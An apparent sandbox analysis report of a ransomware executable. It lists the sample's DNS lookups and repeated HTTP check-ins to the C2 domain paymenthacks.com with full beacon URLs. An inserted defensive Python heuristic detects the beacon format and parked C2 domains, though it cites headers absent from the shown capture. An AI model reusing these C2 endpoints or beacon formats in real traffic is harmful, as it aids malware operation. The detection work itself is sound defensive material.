    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    988 B
    2.7kB
    8
    5

    HTTP Request

    GET http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3491-8c29-81ae9efc1874

    HTTP Response

    200
  • 103.224.212.222:80
    http://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    1.8kB
    877 B
    7
    6

    HTTP Request

    POST http://paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    996 B
    2.7kB
    7
    4

    HTTP Request

    GET http://ww25.paymenthacks.com/?7stO9U=YFKDr9WITbCcbkQQvqH&ju50=mjJ2ArFSzxlu1ylWh&GD21QVGNY=wVkjExWV7jYwrCe6f&UJ4dojwtU=oviX494zKRSRALUqwfR&Nq1y16t0=ug5KfMVOv&TsvTIVsd=Led0z2jSpkTSN4pifA&iHc=1iiZAeExWHa&EBUjq=oP8tq&yhiWS=Qzr&LgDS=SDA5e3y&Clsfg18=fbKWhSKUtw5cBKh&Qbu=sRChqB6TmzIBZs8&fidkTUPk=i7qZkVqXA&CVmjsFF=w0pAGIP&WhSFC7E=mDq76&gtSnATFUX=tgPc7OvEGH&TqL8rk=MZUVUTGKQ&hsLs30=qDc&bMjuda=clYniduzE30VY94&subid1=20211123-2206-3558-8060-76b2b34a1a3f

    HTTP Response

    200
  • 103.224.212.222:443
    https://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    tls, http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    2.1kB
    934 B
    12
    7

    HTTP Request

    POST https://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    844 B
    2.4kB
    7
    4

    HTTP Request

    GET http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3893-a9aa-932565da47dd

    HTTP Response

    200
  • 103.224.212.222:80
    http://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    1.4kB
    637 B
    6
    4

    HTTP Request

    POST http://paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p

    HTTP Response

    302
  • 199.59.242.153:80
    http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999
    http
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    890 B
    2.4kB
    8
    5

    HTTP Request

    GET http://ww25.paymenthacks.com/?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p&subid1=20211123-2206-3877-b811-d79b46f7f999

    HTTP Response

    200
  • 8.8.8.8:53
    paymenthacks.com
    dns
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    62 B
    78 B
    1
    1

    DNS Request

    paymenthacks.com

    DNS Response

    103.224.212.222

  • 8.8.8.8:53
    ww25.paymenthacks.com
    dns
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    67 B
    109 B
    1
    1

    DNS Request

    ww25.paymenthacks.com

    DNS Response

    199.59.242.153

  • 8.8.8.8:53
    mojobiden.com
    dns
    22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6.exe
    59 B
    132 B
    1
    1

    DNS Request

    mojobiden.com

  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    20.101.57.9

  • 20.101.57.9:123
    time.windows.com
    ntp
    76 B
    1
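Two things in the traffic above matter to a defender: the shape of the check-in (a POST to `/` whose query string is a long run of random-looking key/value pairs, `Content-Type: text/plain`, and a bare `Firefox/89.0` user agent that no real Firefox sends), and the fact that every check-in was answered with a 302 to `ww25.paymenthacks.com`, which resolves through a CNAME to `bodis.com` and sets a `parking_session` cookie. The following is an added example, not part of this report, that encodes both observations as heuristics; the samples are constructed from the captured request and response headers above (query string of the redirect shortened, bodies omitted) plus a made-up ordinary browser request for contrast. The thresholds, the `ww25.` prefix and the `bodis.com` suffix are the author's choices drawn from this capture, and the conclusion that the domain is parked is an inference from those headers, not something the report states.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed samples. BEACON and RESP_302 are the second check-in and the
# first redirect captured above (headers as shown, body omitted, Location
# query string shortened); BENIGN is a made-up ordinary browser request.
BEACON = """POST /?9cbMHn0=OSPSZfwlY7hEFcNSitE&BzIbYQ=oXuYfQDfebyfy&wyZm3YLNW=MCfId3m&m6P=LiUfm1&4HG=65etoeVwfjErQ&JMjbeHUd=YtsrN&5h85=D0Sp2PE056&Zulkq=m9g&rqTBKZ=6XgJ2Fa0JAhv&VU8hKR=KVspLObkI&GH3SP2L=VU522xANbKRe&hgH4Sv=9JUTkb0LlUDCUF4p HTTP/1.1
Accept: */*
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Firefox/89.0
Host: paymenthacks.com
Content-Length: 657
Cache-Control: no-cache
"""

BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html
"""

RESP_302 = """HTTP/1.1 302 Found
Date: Tue, 23 Nov 2021 11:06:34 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: __tad=1637665594.1560302; expires=Fri, 21-Nov-2031 11:06:34 GMT; Max-Age=315360000
Location: http://ww25.paymenthacks.com/?subid1=20211123-2206-3491-8c29-81ae9efc1874
Content-Length: 0
Connection: close
"""

# Short alphanumeric tokens with no recognisable parameter names.
RANDOM_TOKEN = re.compile(r"^[A-Za-z0-9]{2,24}$")


def _parse_head(raw):
    """Split an HTTP message head into its start line and a lower-cased
    header dict; repeated headers keep every value."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of head, body follows
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def beacon_indicators(raw_request):
    """Score one request against the traits of the check-ins captured above."""
    start, headers = _parse_head(raw_request)
    method, target, _version = start.split()
    url = urlsplit(target)
    pairs = parse_qsl(url.query, keep_blank_values=True)
    random_pairs = sum(1 for k, v in pairs if RANDOM_TOKEN.match(k) and RANDOM_TOKEN.match(v))
    ua = headers.get("user-agent", [""])[0]
    return {
        "post_to_root": method == "POST" and url.path in ("", "/"),
        "query_pairs": len(pairs),
        # a long query string made entirely of throwaway pairs (threshold is a heuristic)
        "random_query": len(pairs) >= 8 and random_pairs == len(pairs),
        "textplain_post": method == "POST"
        and headers.get("content-type", [""])[0].startswith("text/plain"),
        # real Firefox sends "Mozilla/5.0 (...) Gecko/... Firefox/89.0"
        "bare_browser_ua": bool(ua) and not ua.startswith("Mozilla/"),
    }


def is_blackmatter_beacon(raw_request):
    i = beacon_indicators(raw_request)
    return i["post_to_root"] and i["random_query"] and i["textplain_post"] and i["bare_browser_ua"]


def c2_domain_parked(c2_host, raw_response, cname_chain=()):
    """Decide whether the C2 domain has been handed to a parking service.

    Heuristics drawn from this capture: a 30x to a ww25.<c2_host> landing
    host, a CNAME into bodis.com (a domain-parking provider) and a
    parking_session cookie. Returns (parked, reasons).
    """
    start, headers = _parse_head(raw_response)
    status = int(start.split()[1])
    reasons = []
    location = headers.get("location", [""])[0]
    if status in (301, 302) and location:
        landing = urlsplit(location).hostname or ""
        if landing == "ww25." + c2_host:
            reasons.append("redirect to parking host " + landing)
    if any(c.lower().endswith(".bodis.com") for c in cname_chain):
        reasons.append("CNAME to bodis.com")
    if any("parking_session=" in c for c in headers.get("set-cookie", [])):
        reasons.append("parking_session cookie")
    return bool(reasons), reasons


if __name__ == "__main__":
    print("beacon:", is_blackmatter_beacon(BEACON), beacon_indicators(BEACON))
    print("parked:", c2_domain_parked("paymenthacks.com", RESP_302, ["77026.bodis.com"]))
```

The practical reading of this run: the sample's check-ins (POST with `Content-Length: 853`, then `657`) never reached a live operator endpoint, `mojobiden.com` returned no A record at all, and the file encryption and ransom note drop happened regardless, so the network section documents the beacon format rather than any C2 interaction, and the query-string tokens change between the two check-ins while the payload length does not, which is why the detection above keys on structure rather than on specific parameter names.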

MITRE ATT&CK Enterprise v6


Downloads

  • memory/2632-118-0x0000000000DC3000-0x0000000000DC5000-memory.dmp

    Filesize

    8KB

  • memory/2632-119-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

    Filesize

    4KB
